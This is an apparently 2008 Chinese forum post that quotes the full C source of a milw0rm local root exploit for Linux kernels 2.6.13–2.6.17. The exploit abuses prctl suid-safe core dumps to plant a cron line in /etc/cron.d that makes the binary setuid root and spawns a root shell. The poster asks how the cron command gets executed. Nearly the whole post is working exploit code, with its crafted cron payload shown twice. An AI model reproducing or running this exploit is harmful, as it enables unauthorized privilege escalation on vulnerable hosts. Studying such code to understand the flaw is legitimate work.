- 论坛徽章:
- 0
|
今天看了看下面这段代码,在2.6.13上可以提升权限,但是代码里面的shell命令又是如何被执行到的?
程序好像是利用2.6.13-2.6.17的内核之间coredump的漏洞,把权限返回给父进程,最终获得权限提升
http://www.milw0rm.com/exploits/2005
- /* Linux >= 2.6.13 prctl kernel exploit
- *
- * (C) Julien TINNES
- *
- * If you read the Changelog from 2.6.13 you've probably seen:
- * [PATCH] setuid core dump
- *
- * This patch mainly adds suidsafe to suid_dumpable sysctl but also a new per process,
- * user setable argument to PR_SET_DUMPABLE.
- *
- * This flaw allows us to create a root owned coredump into any directory.
- * This is trivially exploitable.
- *
- */
- #include <sys/types.h>
- #include <sys/time.h>
- #include <sys/resource.h>
- #include <sys/prctl.h>
- #include <unistd.h>
- #include <stdio.h>
- #include <errno.h>
- #include <signal.h>
- #include <stdlib.h>
- #include <time.h>
- #define CROND "/etc/cron.d"
- #define BUFSIZE 2048
- struct rlimit myrlimit={RLIM_INFINITY, RLIM_INFINITY};
- char crontemplate[]=
- "#/etc/cron.d/core suid_dumpable exploit\n"
- "SHELL=/bin/sh\n"
- "PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin\n"
- "#%s* * * * * root chown root:root %s && chmod 4755 %s && rm -rf %s && kill -USR1 %d\n";
- char cronstring[BUFSIZE];
- char fname[BUFSIZE];
- struct timeval te;
- void sh(int sn) {
- execl(fname, fname, (char *) NULL);
- }
-
- int main(int argc, char *argv[]) {
- int nw, pid;
- if (geteuid() == 0) {
- printf("[+] getting root shell\n");
- setuid(0);
- setgid(0);
- if (execl("/bin/sh", "/bin/sh", (char *) NULL)) {
- perror("[-] execle");
- return 1;
- }
- }
- printf("\nprctl() suidsafe exploit\n\n(C) Julien TINNES\n\n");
- /* get our file name */
- if (readlink("/proc/self/exe", fname, sizeof(fname)) == -1) {
- perror("[-] readlink");
- printf("This is not fatal, rewrite the exploit\n");
- }
- if (signal(SIGUSR1, sh) == SIG_ERR) {
- perror("[-] signal");
- return 1;
- }
- printf("[+] Installed signal handler\n");
- /* Let us create core files */
- setrlimit(RLIMIT_CORE, &myrlimit);
- if (chdir(CROND) == -1) {
- perror("[-] chdir");
- return 1;
- }
- /* exploit the flaw */
- if (prctl(PR_SET_DUMPABLE, 2) == -1) {
- perror("[-] prtctl");
- printf("Is you kernel version >= 2.6.13 ?\n");
- return 1;
- }
- printf("[+] We are suidsafe dumpable!\n");
- /* Forge the string for our core dump */
- nw=snprintf(cronstring, sizeof(cronstring), crontemplate, "\n", fname, fname, CROND"/core", getpid());
- if (nw >= sizeof(cronstring)) {
- printf("[-] cronstring is too small\n");
- return 1;
- }
- printf("[+] Malicious string forged\n");
- if ((pid=fork()) == -1) {
- perror("[-] fork");
- return 1;
- }
- if (pid == 0) {
- /* This is not the good way to do it ;) */
- sleep(120);
- exit(0);
- }
- /* SEGFAULT the child */
- printf("[+] Segfaulting child\n");
- if (kill(pid, 11) == -1) {
- perror("[-] kill");
- return 1;
- }
- if (gettimeofday(&te, NULL) == 0)
- printf("[+] Waiting for exploit to succeed (~%ld seconds)\n", 60 - (te.tv_sec%60));
- sleep(120);
- printf("[-] It looks like the exploit failed\n");
- return 1;
- }
- // milw0rm.com [2006-07-12]
- char crontemplate[]=
- "#/etc/cron.d/core suid_dumpable exploit\n"
- "SHELL=/bin/sh\n"
- "PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin\n"
- "#%s* * * * * root chown root:root %s && chmod 4755 %s && rm -rf %s && kill -USR1 %d\n";
这个地方,跟着代码调了好久好久,我还是没有明白它是如何被执行到的,请知道的朋友说一声,谢谢:)
[ 本帖最后由 hongmy525 于 2008-5-27 20:39 编辑 ] |
|
免费注册
发表于 2008-05-27 20:35
